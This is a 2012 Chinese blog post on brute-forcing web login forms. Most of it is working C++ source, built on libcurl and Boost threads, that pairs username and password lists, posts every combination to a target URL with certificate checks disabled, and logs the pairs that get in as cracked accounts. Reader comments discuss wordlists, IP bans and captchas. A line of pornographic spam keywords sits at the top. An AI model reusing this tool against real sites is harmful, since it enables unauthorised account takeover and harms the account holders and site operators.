久久Av无码精品人妻系列,97精品依人久久久大香线蕉97,久久99精品国产

暴力破解Web表單

圖為我的思考方式:

SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
        FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
    curl_global_init(CURL_GLOBAL_ALL);
    SYSTEM_INFO info;//根據(jù)CPU生成線程數(shù)
    GetSystemInfo(&info);
    vector<string> user(istream_iterator<string>(ifstream(userfilename.c_str())),istream_iterator<string>());
    vector<string> pass(istream_iterator<string>(ifstream(passwordfilename.c_str())),istream_iterator<string>());
    fstream filed(headerfilename);
    while (!filed.eof())
    {
        char temp[4096]="";
        filed.getline(temp,4096);
        vecheader1.push_back(temp);
    }
    filed.close();
    CWork::readpostdata(m_postdata);
    CWork::readkeyword(keyword);
    CWork::readurl(url);

    vector<UserPass> obj_userpass;
    for(size_t i=0;i!=user.size();i++)
    {
        for(size_t j=0;j!=pass.size();j++)
        {
            UserPass temp;
            temp.user=user[i];
            temp.pass=pass[j];
            obj_userpass.push_back(temp);
        }
    }

    string console_title;
    CWork::maketitle(console_title,"帳號(hào)數(shù)量:",user.size());
    CWork::maketitle(console_title,"密碼數(shù)量:",pass.size());
    CWork::maketitle(console_title,"共計(jì)次數(shù):",obj_userpass.size());
    wstring w_console_title=CWork::s2ws(console_title);
    SetConsoleTitle(w_console_title.c_str());

    user.clear();
    pass.clear();

    ////////////////////////生成測(cè)試數(shù)據(jù)////////////////////////
    if(obj_userpass.size()>=1)
    {
        pull_one_url(obj_userpass[0]);
        ofstream out("第一次數(shù)據(jù)測(cè)試.txt",ios::app);
        out<<sz_head<<endl<<endl;
        out<<"--------分割性-----------"<<endl;
        out<<sz_html<<endl;
        out.close();
    }
    ////////////////////////為了觀察一下關(guān)鍵字，到底應(yīng)該設(shè)置什么////////////////////////

    int thread_num=info.dwNumberOfProcessors*2;
    long current_pos=1;
    long result=0;
    int num_total=obj_userpass.size();
    console_title+="已發(fā)送:";

    while (1)
    {
        if (obj_userpass.size()<current_pos)
        {
            break;
        }
        vector<UserPass> obj;
        CWork::allocateUserPass(obj,obj_userpass,current_pos,thread_num);
        stringstream strStream;
        strStream<<result;
        string new_tile=console_title;
        new_tile+=strStream.str();
        if (szCount!=0)
        {
            new_tile+="  已成功破解:";
            stringstream strStream1;
            strStream1<<szCount;
            new_tile+=strStream1.str();
        }
        wstring w_console_title=CWork::s2ws(new_tile);
        SetConsoleTitle(w_console_title.c_str());
        thread_group threads;
        int obj_num=obj.size();
        for (int i = 0; i!=obj_num; ++ i) {
            result++;
            threads.create_thread(boost::bind(&pull_one_url,obj[i]));
        }
        threads.join_all();

    }
    cout<<"所有密碼全部查找完成"<<endl;
    curl_global_cleanup();

void pull_one_url(UserPass obj)
{
    bool m_true=true;
    transform(keyword.begin(), keyword.end(), keyword.begin(), ::tolower);//所有html代碼，轉(zhuǎn)化為小寫(xiě)
    while(m_true)
    {
        string dddddd=m_postdata;
        if(dddddd.empty())
        {
            cout<<"postdata中數(shù)據(jù)為空,線程馬上退出"<<endl;
            return;
        }
        if (url.empty()||url=="")
        {
            cout<<"attackurl.txt不存在，或url地址為空"<<endl;
            return;
        }



            CURL *curl = curl_easy_init();
            string m_url=url;

            string header;
            string html;

            struct curl_slist *slist_header = NULL;
            for (int i=0;i!=vecheader1.size();i++)
            {
                slist_header = curl_slist_append(slist_header,vecheader1[i].c_str());
            }
            curl_easy_setopt(curl, CURLOPT_HTTPHEADER, slist_header);
            //連接服務(wù)器和發(fā)送請(qǐng)求的超時(shí)設(shè)置,單位是毫秒
            curl_easy_setopt(curl, CURLOPT_POST, 1);
            //curl_easy_setopt(curl,CURLOPT_FOLLOWLOCATION,1);
            curl_easy_setopt(curl,CURLOPT_TIMEOUT_MS,10000);
            curl_easy_setopt(curl,CURLOPT_CONNECTTIMEOUT_MS,10000);
            curl_easy_setopt(curl, CURLOPT_NOSIGNAL, 1);
            curl_easy_setopt(curl, CURLOPT_URL, url.c_str());
            if(m_url.substr(0,5)=="https")
            {
                curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L);
                curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L);
            }
            curl_easy_setopt(curl, CURLOPT_DNS_CACHE_TIMEOUT, 10000);
            curl_easy_setopt(curl, CURLOPT_TIMEOUT, 6000);
            //curl_easy_setopt(curl, CURLOPT_VERBOSE,1);
            curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, html_write_data);

            CWork::replace(dddddd,"{0%}",obj.user.c_str());
            CWork::replace(dddddd,"{1%}",obj.pass.c_str());

            curl_easy_setopt(curl, CURLOPT_POSTFIELDSIZE, dddddd.length());     // Content-Length:
            curl_easy_setopt(curl,CURLOPT_POSTFIELDS,dddddd.c_str());  //post提交的數(shù)據(jù)
            curl_easy_setopt(curl, CURLOPT_WRITEDATA, &html);
            curl_easy_setopt(curl, CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0");
            curl_easy_setopt(curl, CURLOPT_HEADERFUNCTION, header_write_data);
            curl_easy_setopt(curl, CURLOPT_WRITEHEADER, &header);

            curl_easy_perform(curl); /* ignores error */
            //curl_easy_getinfo(curl,CURLINFO_SIZE_DOWNLOAD,&html_num);//返回的html文件大小
            long   http_code=0;
            curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &http_code);
            //curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &m_time);//總耗時(shí)
            //curl_easy_getinfo(curl,CURLINFO_CONNECT_TIME, &connect_time);//連接時(shí)間
            //curl_easy_getinfo(curl,CURLINFO_NAMELOOKUP_TIME, &datatime);//dns查詢時(shí)間
            //curl_easy_getinfo(curl, CURLINFO_PRIMARY_IP, &IP);//ip地址

            //CURLINFO_PRETRANSFER_TIME：從建立連接到準(zhǔn)備傳輸所使用的時(shí)間；
            //CURLINFO_STARTTRANSFER_TIME：從建立連接到傳輸開(kāi)始所使用的時(shí)間；
            //ptime now2 = microsec_clock::universal_time() + hours(8);
            //boost::posix_time::millisec_posix_time_system_config::time_duration_type time_elapse = now2 - now1;
            transform(header.begin(), header.end(), header.begin(), ::tolower);//所有html代碼，轉(zhuǎn)化為小寫(xiě)
            transform(html.begin(), html.end(), html.begin(), ::tolower);//所有html代碼，轉(zhuǎn)化為小寫(xiě)
            //在這里對(duì)html代碼進(jìn)行轉(zhuǎn)碼,如果是utf8就轉(zhuǎn)gb2312
            if(header.find("utf")!=-1)
            {
                string gb2312html;
                CWork::Utf8ToGb2312(html.c_str(),gb2312html);
                html=gb2312html;
            }

            if (http_code==200||http_code==302)
            {
                if (html.find(keyword)==-1)
                {
                    szCount++;
                    boost::mutex::scoped_lock lock(io_mutex);
                    ofstream out(result,ios::app);
                    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_GREEN);
                    out<<"恭喜!!!  用戶名:"<<obj.user<<"    密碼:"<<obj.pass<<endl;
                    cout<<"http狀態(tài)"<<http_code<<"密碼破解成功1個(gè)    username:"<<obj.user<<"    password:"<<obj.pass<<endl;
                    out.close();
                    SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE),FOREGROUND_INTENSITY |
                        FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
                }
                else
                {
                    boost::mutex::scoped_lock lock(io_mutex);
                    cout<<"密碼錯(cuò)誤"<<" 線程ID: "<<boost::this_thread::get_id()<<" http_code:"<<setw(3)<<http_code<<" 用戶名:"<<obj.user<<" 密碼:"<<obj.pass<<endl;
                }
            }
            else
            {
                if(http_code==0)
                {
                    boost::mutex::scoped_lock lock(io_mutex);
                    cout<<"超時(shí)馬上重新連接"<<"用戶名:"<<obj.user<<" 密碼:"<<obj.pass<<endl;
                    curl_easy_cleanup(curl);
                    continue;
                }
                boost::mutex::scoped_lock lock(io_mutex);
                cout<<"密碼錯(cuò)誤"<<" 線程ID: "<<boost::this_thread::get_id()<<" http_code:"<<http_code<<" 用戶名:"<<obj.user<<" 密碼:"<<obj.pass<<endl;
            }
            m_true=false;
            curl_easy_cleanup(curl);


            sz_html=html;
            sz_head=header;
        }

}

posted on 2012-07-09 18:07 公子周閱讀(2930) 評(píng)論(4) 編輯收藏引用所屬分類: 暴力破解

評(píng)論

# re: 暴力破解Web表單[未登錄](méi) 回復(fù) 更多評(píng)論

如何設(shè)計(jì)用戶名、密碼本？或者說(shuō)如何獲得良好的這種本？

2012-07-10 08:55 | alex

# re: 暴力破解Web表單回復(fù) 更多評(píng)論

難道人家不會(huì)封IP?

你這IP頻繁登錄,肯定被封?

然后又代理?

然后又封代理的IP

哈...

找到網(wǎng)站的漏洞,直接rush

2012-07-10 11:52 | 13174115

# re: 暴力破解Web表單回復(fù) 更多評(píng)論

@alex

如何設(shè)計(jì)用戶名、密碼本？或者說(shuō)如何獲得良好的這種本？

post登陸的時(shí)候，是一個(gè)form表單，數(shù)據(jù)格式，先通過(guò)其它工具，如firefox查看，然后，得到下來(lái)，把用戶名和密碼，的位置替換成我的變量。寫(xiě)入文件中。

程序會(huì)根據(jù)我設(shè)置的用戶名和密碼，替換
post提交的數(shù)據(jù)。

2012-07-10 21:10 | 公子周

# re: 暴力破解Web表單 回復(fù) 更多評(píng)論

沒(méi)有驗(yàn)證碼嗎？

2012-07-13 20:54 | 羊

刷新評(píng)論列表

只有注冊(cè)用戶登錄后才能發(fā)表評(píng)論。
【推薦】100%開(kāi)源！大型工業(yè)跨平臺(tái)軟件C++源碼提供，建模，組態(tài)！



網(wǎng)站導(dǎo)航: 博客園 IT新聞 BlogJava 博問(wèn) Chat2DB 管理

# re: 暴力破解Web表單[未登錄](méi) 回復(fù) 更多評(píng)論

# re: 暴力破解Web表單回復(fù) 更多評(píng)論

# re: 暴力破解Web表單回復(fù) 更多評(píng)論

# re: 暴力破解Web表單 回復(fù) 更多評(píng)論

公子周

暴力破解Web表單

評(píng)論

導(dǎo)航

常用鏈接

留言簿

隨筆分類

隨筆檔案

最新隨筆

搜索

最新評(píng)論

評(píng)論排行榜

公子周

暴力破解Web表單

評(píng)論

# re: 暴力破解Web表單[未登錄](méi) 回復(fù) 更多評(píng)論

# re: 暴力破解Web表單 回復(fù) 更多評(píng)論

# re: 暴力破解Web表單 回復(fù) 更多評(píng)論

# re: 暴力破解Web表單 回復(fù) 更多評(píng)論

導(dǎo)航

常用鏈接

留言簿

隨筆分類

隨筆檔案

最新隨筆

搜索

最新評(píng)論

評(píng)論排行榜

# re: 暴力破解Web表單回復(fù) 更多評(píng)論

# re: 暴力破解Web表單回復(fù) 更多評(píng)論

# re: 暴力破解Web表單回復(fù) 更多評(píng)論